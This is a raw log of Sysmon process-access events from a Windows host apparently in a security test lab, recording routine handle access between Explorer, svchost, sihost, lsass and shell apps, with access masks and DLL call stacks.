13:58:35.414{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x800000000000000012100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.414{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+56e0d 10341000x800000000000000012099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11564624C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11564624C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000012095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93F9-6005-F204-00000000A301}42964840C:\Windows\system32\sihost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FB-6005-FD04-00000000A301}11561068C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x800000000000000012091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37843904C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.398{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.383{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.367{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.367{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.367{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 